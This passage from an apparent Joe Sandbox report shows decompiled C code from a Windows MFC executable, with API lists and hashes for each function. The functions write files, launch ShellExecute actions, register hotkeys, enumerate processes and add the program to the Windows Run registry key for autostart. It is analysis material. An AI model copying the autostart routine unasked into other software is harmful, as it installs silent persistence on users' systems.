					if(WriteFile(_t90,  *(_t92 - 0x10),  *( *(_t92 - 0x10) - 8), _t92 - 0x24, 0) != 0) {
						_push(1);
						_pop(0);
					}
					CloseHandle(_t90);
				}
				 *(_t92 - 4) =  *(_t92 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t92 - 0xc));
				return 0;
			}

0x004257ad
0x004257be
0x004257cb
0x004257cc
0x004257cf
0x004257d4
0x004257db
0x004257e1
0x004257ea
0x004257ec
0x004257ee
0x004257f6
0x004257fe
0x00425805
0x00425806
0x00425810
0x00425819
0x00425823
0x00425831
0x0042583d
0x00425841
0x00425849
0x00425853
0x00425857
0x0042585a
0x0042585e
0x00425861
0x00425863
0x00425865
0x00425869
0x0042586a
0x00425875
0x00425879
0x00425881
0x00425885
0x0042588d
0x00425891
0x00425899
0x0042589c
0x004258b9
0x004258be
0x004258d6
0x004258d8
0x004258da
0x004258da
0x004258dc
0x004258dc
0x004258e2
0x004258e9
0x004258f6
0x004258fe

APIs

__EH_prolog.LIBCMT ref: 004257AD
#540.MFC42 ref: 004257BE
#6673.MFC42(?), ref: 004257CF

Part of subcall function 0042A943: WSAStartup.WSOCK32(00000101,?), ref: 0042A95B
Part of subcall function 0042A943: gethostname.WSOCK32(?,00000064,00000101,?), ref: 0042A96C
Part of subcall function 0042A943: lstrcmpA.KERNEL32(?,004550CC,?,00000064,00000101,?), ref: 0042A982
Part of subcall function 0042A943: gethostbyname.WSOCK32(?), ref: 0042A994
Part of subcall function 0042A943: htonl.WSOCK32(?,?), ref: 0042A9DB
Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042A9F0
Part of subcall function 0042A943: lstrcatA.KERNEL32(?,?), ref: 0042A9FC
Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042AA0E
Part of subcall function 0042A943: lstrcatA.KERNEL32(?,00453F68), ref: 0042AA17
Part of subcall function 0042A943: strcat.MSVCRT(?,?), ref: 0042AA20
Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042AA35
Part of subcall function 0042A943: lstrcatA.KERNEL32(?,00453F68), ref: 0042AA3E
Part of subcall function 0042A943: strcat.MSVCRT(?,?), ref: 0042AA47
Part of subcall function 0042A943: _itoa.MSVCRT ref: 0042AA57
Part of subcall function 0042A943: lstrcatA.KERNEL32(?,00453F68), ref: 0042AA60

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

Part of subcall function 004290DB: GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,00455AE8,00000032,00000000,?,?,00429D29,?,?,?,?), ref: 004290FD
Part of subcall function 004290DB: #537.MFC42(00455AE8,?,00429D29,?,?,?,?), ref: 00429107

Part of subcall function 00429098: GetDateFormatA.KERNEL32(00000400,00000000,?,dddd, d MMMM,00455B1C,00000032,?,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290BD
Part of subcall function 00429098: CharUpperBuffA.USER32(00455B1C,00000001,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290C6
Part of subcall function 00429098: #537.MFC42(00455B1C,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290D0

#2818.MFC42(?,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 0042586A
#800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00425879
#800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00425885
#800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00425891
#800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042589C
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004258B3
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004258CE
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004258DC
#800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004258E9

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$_itoalstrcat$#537$FileFormatstrcat$#1168#2818#540#6673BuffCharCloseCreateDateH_prologHandleLoadStartupStringTimeUpperWritegethostbynamegethostnamehtonllstrcmp
String ID:
API String ID: 545889104-0
Opcode ID: 8d8e9aeebc3f8646fd0442d61515dd55999b0b0dfe504a9ed2343bb8155cbd0b
Instruction ID: ea83334349e1345f7e2b39c5aa52f92b30f19cd4b918af62beb1ff4c60b0ced4
Opcode Fuzzy Hash: 8d8e9aeebc3f8646fd0442d61515dd55999b0b0dfe504a9ed2343bb8155cbd0b
Instruction Fuzzy Hash: 3B41ED71D0125CEEDB11EBA4DD85BEEBBB8AF19308F10456AF511A3291DB385F08CB25

Uniqueness

Uniqueness Score: -1.00%

Function 0040C33B, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 119
windowCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040C33B(intOrPtr* __ecx, void* __eflags) {
				intOrPtr _t53;
				int _t55;
				void* _t56;
				int _t58;
				void* _t66;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t72;
				struct HWND__* _t80;
				int _t89;
				intOrPtr* _t93;
				void* _t95;

				E0043E4E0(0x43fd6c, _t95);
				_t93 = __ecx;
				_t89 = 1;
				_push(__ecx);
				 *(_t95 - 0x10) = _t89;
				E0040C4A1(_t95 - 0x44);
				_t53 =  *((intOrPtr*)(__ecx + 8));
				 *(_t95 - 4) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				if(_t53 == 0) {
					L23:
					 *(_t93 + 0x24) =  *(_t93 + 0x24) | 0xffffffff;
					 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff;
					L00403FBC(_t95 - 0x44);
					_t55 = _t89;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
					return _t55;
				}
				_t56 = _t53 - 1;
				if(_t56 == 0) {
					_t80 =  *(__ecx + 0x20);
					_push(__ecx);
					_push(0);
					_push( *((intOrPtr*)(__ecx + 0x1c)));
					if(_t80 != 0xffff) {
						_t58 = SendMessageA(_t80, ??, ??, ??);
					} else {
						_t58 = PostMessageA(0xffff, ??, ??, ??);
					}
					 *(_t95 - 0x10) = _t58;
					if(_t58 != 0) {
						goto L23;
					} else {
						 *(_t93 + 0x24) = 0xfffffffd;
						L10:
						 *(_t95 - 0x20) =  *(_t93 + 0x24);
						 *(_t95 - 0x1c) =  *(_t93 + 0x28);
						E0040C2DE(_t93, _t95 - 0x44);
						if( *(_t95 - 0x10) != 0) {
							 *(_t93 + 0x24) =  *(_t93 + 0x24) | 0xffffffff;
						} else {
							if( *((intOrPtr*)(_t95 + 8)) != 0) {
								 *((intOrPtr*)( *_t93))();
							}
						}
						 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff;
						L00403FBC(_t95 - 0x44);
						_t55 =  *(_t95 - 0x10);
						goto L24;
					}
				}
				_t66 = _t56 - 1;
				if(_t66 == 0) {
					 *(_t95 - 0x14) = "open";
					L8:
					_t18 = _t95 - 0x14; // 0x453854
					_t68 = ShellExecuteA(0,  *_t18,  *(_t93 + 0xc),  *(_t93 + 0x10),  *(_t93 + 0x14),  *(_t93 + 0x18));
					 *(_t93 + 0x28) = _t68;
					if(_t68 <= 0x20) {
						 *(_t95 - 0x10) = 0;
						 *(_t93 + 0x24) = _t68;
						 *(_t93 + 0x28) = 0;
					}
					goto L10;
				}
				_t69 = _t66 - 1;
				if(_t69 == 0) {
					 *(_t95 - 0x14) = "print";
					goto L8;
				}
				_t70 = _t69 - 1;
				if(_t70 == 0) {
					 *(_t95 - 0x14) = "explore";
					goto L8;
				}
				if(_t70 == 1) {
					_t72 = _t95 - 0x18;
					_push(__ecx + 0xc);
					_push("mailto:");
					_push(_t72);
					 *(_t95 - 0x14) = "open";
					L0043E168();
					_push(_t72);
					 *(_t95 - 4) = 1;
					L0043DFCA();
					 *(_t95 - 4) = 0;
					L0043DD36();
					goto L8;
				} else {
					 *(_t95 - 0x10) = 0;
					 *((intOrPtr*)(__ecx + 0x24)) = 0xfffffffe;
					goto L10;
				}
			}

0x0040c340
0x0040c34d
0x0040c34f
0x0040c350
0x0040c354
0x0040c357
0x0040c361
0x0040c363
0x0040c366
0x0040c369
0x0040c47e
0x0040c47e
0x0040c482
0x0040c489
0x0040c48e
0x0040c490
0x0040c496
0x0040c49e
0x0040c49e
0x0040c36f
0x0040c370
0x0040c438
0x0040c440
0x0040c441
0x0040c442
0x0040c447
0x0040c453
0x0040c449
0x0040c44a
0x0040c44a
0x0040c45b
0x0040c45e
0x00000000
0x0040c460
0x0040c460
0x0040c3f4
0x0040c3f9
0x0040c3ff
0x0040c406
0x0040c40e
0x0040c469
0x0040c410
0x0040c413
0x0040c419
0x0040c419
0x0040c413
0x0040c46d
0x0040c474
0x0040c479
0x00000000
0x0040c479
0x0040c45e
0x0040c376
0x0040c377
0x0040c42f
0x0040c3ca
0x0040c3d9
0x0040c3dd
0x0040c3e6
0x0040c3e9
0x0040c3eb
0x0040c3ee
0x0040c3f1
0x0040c3f1
0x00000000
0x0040c3e9
0x0040c37d
0x0040c37e
0x0040c426
0x00000000
0x0040c426
0x0040c384
0x0040c385
0x0040c41d
0x00000000
0x0040c41d
0x0040c38c
0x0040c39d
0x0040c3a0
0x0040c3a1
0x0040c3a6
0x0040c3a7
0x0040c3ae
0x0040c3b3
0x0040c3b6
0x0040c3ba
0x0040c3c2
0x0040c3c5
0x00000000
0x0040c38e
0x0040c38e
0x0040c391
0x00000000
0x0040c391

APIs

__EH_prolog.LIBCMT ref: 0040C340

Part of subcall function 0040C4A1: __EH_prolog.LIBCMT ref: 0040C4A6
Part of subcall function 0040C4A1: #535.MFC42(?,00000001,?,?,0040C35C), ref: 0040C4C9
Part of subcall function 0040C4A1: #535.MFC42(?,?,00000001,?,?,0040C35C), ref: 0040C4D9
Part of subcall function 0040C4A1: #535.MFC42(?,?,?,00000001,?,?,0040C35C), ref: 0040C4E9

#926.MFC42(?,mailto:,?), ref: 0040C3AE
#858.MFC42(00000000,?,mailto:,?), ref: 0040C3BA
#800.MFC42(00000000,?,mailto:,?), ref: 0040C3C5
ShellExecuteA.SHELL32(00000000,T8E,?,?,open,?), ref: 0040C3DD
PostMessageA.USER32 ref: 0040C44A
SendMessageA.USER32(?,?,00000000), ref: 0040C453

Strings

open, xrefs: 0040C3D6
T8E, xrefs: 0040C3D9
mailto:, xrefs: 0040C3A1

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #535$H_prologMessage$#800#858#926ExecutePostSendShell
String ID: T8E$mailto:$open
API String ID: 3398598249-3025285594
Opcode ID: 6247d9da6b809c4ee07c7427865a15069e766f05ccdd5fe3d45040bb234485e5
Instruction ID: 508d97c8793d561e66a460f693c62342e6e855f8a90b7849c99228def6b57334
Opcode Fuzzy Hash: 6247d9da6b809c4ee07c7427865a15069e766f05ccdd5fe3d45040bb234485e5
Instruction Fuzzy Hash: 38416CB0900605DBCB20DFA5C9948BFBBF4FB48354B104B2EE456A26D0D738AA05DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00422006, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 91
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00422006(void* __ecx) {
				struct HWND__* _t34;
				signed char _t37;
				struct HWND__* _t39;
				signed char _t53;
				signed char _t62;
				void* _t64;
				void* _t66;

				E0043E4E0(0x442354, _t66);
				_t64 = __ecx;
				 *((char*)(_t66 - 0xd)) = 1;
				if(__ecx != 0) {
					_t34 =  *(__ecx + 0x20);
				} else {
					_t34 = 0;
				}
				UnregisterHotKey(_t34, 0);
				_t53 =  *(_t64 + 0x17cc);
				_t37 =  *((intOrPtr*)(_t64 + 0x17cd));
				_t62 = 0;
				if((_t53 & 0xffff7fff) != 0) {
					if((_t37 & 0x00000001) != 0) {
						_t62 = 4;
					}
					if((_t37 & 0x00000002) != 0) {
						_t62 = _t62 | 0x00000002;
					}
					if((_t37 & 0x00000004) != 0) {
						_t62 = _t62 | 0x00000001;
					}
					if((_t53 & 0x00000080) != 0) {
						_t62 = _t62 | 0x00000008;
					}
					if(_t64 != 0) {
						_t39 =  *(_t64 + 0x20);
					} else {
						_t39 = 0;
					}
					if(RegisterHotKey(_t39, 0, _t62 & 0x000000ff,  *(_t64 + 0x17cc) & 0x000000ff) == 0) {
						_t84 =  *((intOrPtr*)(_t66 + 8));
						if( *((intOrPtr*)(_t66 + 8)) != 0) {
							wsprintfA(_t66 - 0xdc,  *(E00429029(_t66 + 8, 0xe045)), 1);
							L0043DD36();
							_push(0);
							_push(0x30);
							_push(_t66 - 0xdc);
							L0043E16E();
						}
						_push("pk.bin");
						_push(0x4558c8);
						_push(_t66 - 0x14);
						 *(_t64 + 0x17cc) = 0;
						L0043DE20();
						 *(_t66 - 4) = 0;
						E0040BC5C(_t64 + 0x16b8, _t84,  *((intOrPtr*)(_t66 - 0x14)));
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						L0043DD36();
						 *((char*)(_t66 - 0xd)) = 0;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
				return  *((intOrPtr*)(_t66 - 0xd));
			}

0x0042200b
0x00422018
0x0042201e
0x00422022
0x00422028
0x00422024
0x00422024
0x00422024
0x0042202d
0x00422033
0x0042203b
0x00422041
0x00422049
0x00422051
0x00422053
0x00422053
0x00422058
0x0042205a
0x0042205a
0x0042205f
0x00422061
0x00422061
0x00422067
0x00422069
0x00422069
0x0042206e
0x00422074
0x00422070
0x00422070
0x00422070
0x0042208d
0x0042208f
0x00422092
0x004220b0
0x004220bc
0x004220c1
0x004220c8
0x004220ca
0x004220cb
0x004220cb
0x004220d0
0x004220d8
0x004220dd
0x004220de
0x004220e4
0x004220f1
0x004220f4
0x004220f9
0x00422100
0x00422105
0x00422105
0x0042208d
0x00422110
0x00422118

APIs

__EH_prolog.LIBCMT ref: 0042200B
UnregisterHotKey.USER32(?,00000000,?,00000000), ref: 0042202D
RegisterHotKey.USER32(?,00000000,?,?,?,00000000), ref: 00422085
wsprintfA.USER32 ref: 004220B0
#800.MFC42 ref: 004220BC
#1200.MFC42(?,00000030,00000000), ref: 004220CB
#924.MFC42(?,004558C8,pk.bin,?,00000000), ref: 004220E4
#800.MFC42(?,004558C8,pk.bin,?,00000000), ref: 00422100

Strings

T#D, xrefs: 00422006
pk.bin, xrefs: 004220D0

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#1200#924H_prologRegisterUnregisterwsprintf
String ID: T#D$pk.bin
API String ID: 131833242-2389127637
Opcode ID: 7253a3284697f08c8775a1c482189036f6b92751c287326f864385b8c5144bd8
Instruction ID: a97f19a86c8e43e48310f7ab55b4d8e7a6396db94ecbe62869580f106e88529e
Opcode Fuzzy Hash: 7253a3284697f08c8775a1c482189036f6b92751c287326f864385b8c5144bd8
Instruction Fuzzy Hash: 27314B71900364AEDB349BB4E995BEB77A8EF09344F40052FF656A22D1D77C5A04C628

Uniqueness

Uniqueness Score: -1.00%

Function 00428947, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 91
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428947(struct HWND__* _a4, CHAR* _a8) {
				long _v8;
				char _v268;
				intOrPtr _v288;
				intOrPtr _v296;
				void _v300;
				void* _v304;
				void _v848;
				char _v852;
				int _t33;
				intOrPtr _t37;
				int _t39;
				int _t40;
				void* _t46;
				signed int _t50;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;

				_t50 = 0x49;
				_v304 = 0;
				memset( &_v300, 0, _t50 << 2);
				_t63 = _t62 + 0xc;
				if(IsWindow(_a4) != 0) {
					GetWindowThreadProcessId(_a4,  &_v8);
					__eflags =  *0x455ba0; // 0x1
					if(__eflags == 0) {
						_t61 = CreateToolhelp32Snapshot(2, 0);
						__eflags = _t61 - 0xffffffff;
						if(_t61 == 0xffffffff) {
							L14:
							return 0;
						}
						_v304 = 0x128;
						_t33 = Process32First(_t61,  &_v304);
						__eflags = _t33;
						if(_t33 == 0) {
							L13:
							CloseHandle(_t61);
							goto L14;
						}
						__eflags = 0;
						_v852 = 0;
						memset( &_v848, 0, 0x88 << 2);
						_t64 = _t63 + 0xc;
						while(1) {
							_t37 = _v296;
							__eflags = _v8 - _t37;
							if(_v8 != _t37) {
								goto L10;
							}
							_t40 = E004288B3(_t37, _v288,  &_v852, 0x224);
							_t64 = _t64 + 0x10;
							__eflags = _t40;
							if(_t40 == 0) {
								goto L10;
							}
							__eflags = _v8 - _v296;
							if(_v8 == _v296) {
								lstrcpyA(_a8,  &_v268);
								CharLowerA(_a8);
								CloseHandle(_t61);
								_t46 = 1;
								return _t46;
							}
							L10:
							_t39 = Process32Next(_t61,  &_v304);
							__eflags = _t39;
							if(_t39 == 0) {
								goto L13;
							}
						}
					}
					return E00428B5B(0, _v8, _a8);
				}
				 *_a8 = 0;
				goto L14;
			}

0x00428957
0x00428963
0x00428969
0x00428969
0x00428973
0x00428986
0x0042898c
0x00428992
0x004289af
0x004289b1
0x004289b4
0x00428a64
0x00000000
0x00428a64
0x004289c0
0x004289cc
0x004289d2
0x004289d4
0x00428a5d
0x00428a5e
0x00000000
0x00428a5e
0x004289df
0x004289e7
0x004289ed
0x004289ed
0x004289ef
0x004289ef
0x004289f5
0x004289f8
0x00000000
0x00000000
0x00428a0d
0x00428a12
0x00428a15
0x00428a17
0x00000000
0x00000000
0x00428a1c
0x00428a22
0x00428a42
0x00428a4b
0x00428a52
0x00428a5a
0x00000000
0x00428a5a
0x00428a24
0x00428a2c
0x00428a32
0x00428a34
0x00000000
0x00000000
0x00428a36
0x004289ef
0x00000000
0x004289a0
0x00428978
0x00000000

APIs

IsWindow.USER32(00000000), ref: 0042896B
GetWindowThreadProcessId.USER32(00000000,?), ref: 00428986

Strings

__oxFrame.class__, xrefs: 00428951

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$ProcessThread
String ID: __oxFrame.class__
API String ID: 3635926707-3739978297
Opcode ID: 62369c029c0a61409b76ad9760f942c92b8f02d39cefc21e6db5afb063a9013e
Instruction ID: 7e1c3c89b65c289cb3099e9c697ae78b5c1499a45dc08a2aeb80b7d05f38034f
Opcode Fuzzy Hash: 62369c029c0a61409b76ad9760f942c92b8f02d39cefc21e6db5afb063a9013e
Instruction Fuzzy Hash: DA31A471602128AFDB219F60EC49AEE77B8EB05351F4040ABF505A6150DF349F948F59

Uniqueness

Uniqueness Score: -1.00%

Function 0042817C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042817C(void* __esi, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				void* _v8;
				char _v72;
				char _v352;
				char _v612;
				CHAR* _t45;

				E00428249();
				GetModuleFileNameA(0,  &_v612, 0x104);
				lstrcpyA( &_v352,  &_v612);
				_t45 = _a4;
				if( *_t45 != 0) {
					lstrcatA( &_v352, " ");
					lstrcatA( &_v352, _t45);
				}
				E0042A6AA( &_v72, 0, 0);
				 *(strrchr( &_v72, 0x2e)) = 0;
				RegCreateKeyA((0 | _a8 != 0x00000001) + 0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",  &_v8);
				RegSetValueExA(_v8,  &_v72, 0, 1,  &_v352, lstrlenA( &_v352) + 1);
				return RegCloseKey(_v8);
			}

0x00428187
0x0042819b
0x004281af
0x004281b5
0x004281ba
0x004281cf
0x004281d9
0x004281db
0x004281e2
0x004281f6
0x00428210
0x00428236
0x00428248

APIs

Part of subcall function 00428249: strrchr.MSVCRT ref: 00428265
Part of subcall function 00428249: RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00428284
Part of subcall function 00428249: RegDeleteValueA.ADVAPI32(?,?), ref: 00428293
Part of subcall function 00428249: RegCloseKey.ADVAPI32(?), ref: 0042829E
Part of subcall function 00428249: RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 004282AE
Part of subcall function 00428249: RegDeleteValueA.ADVAPI32(?,?), ref: 004282B7
Part of subcall function 00428249: RegCloseKey.ADVAPI32(?), ref: 004282BC

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0042819B
lstrcpyA.KERNEL32(?,?), ref: 004281AF
lstrcatA.KERNEL32(?,004541C8), ref: 004281CF
lstrcatA.KERNEL32(?,?), ref: 004281D9
strrchr.MSVCRT ref: 004281ED
RegCreateKeyA.ADVAPI32(-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00428210
lstrlenA.KERNEL32(?), ref: 0042821D
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000001), ref: 00428236
RegCloseKey.ADVAPI32(?), ref: 0042823F

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 00428202

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: CloseValue$DeleteOpenlstrcatstrrchr$CreateFileModuleNamelstrcpylstrlen
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
API String ID: 3785328975-3913687870
Opcode ID: 703e5a640901f32a746c41b41471c7f969fdfada5f4aac2c96669a2c21fbb7cc
Instruction ID: 29f1e0553c9cdc7b2c669a3b8a48eea1458520c317e9796395c3e976d93f0f52
Opcode Fuzzy Hash: 703e5a640901f32a746c41b41471c7f969fdfada5f4aac2c96669a2c21fbb7cc
Instruction Fuzzy Hash: 2F211AB690021CEFDB10DBE0DC8DEDE7B7CEB86306F1004A2B605E6151D6759A998B64

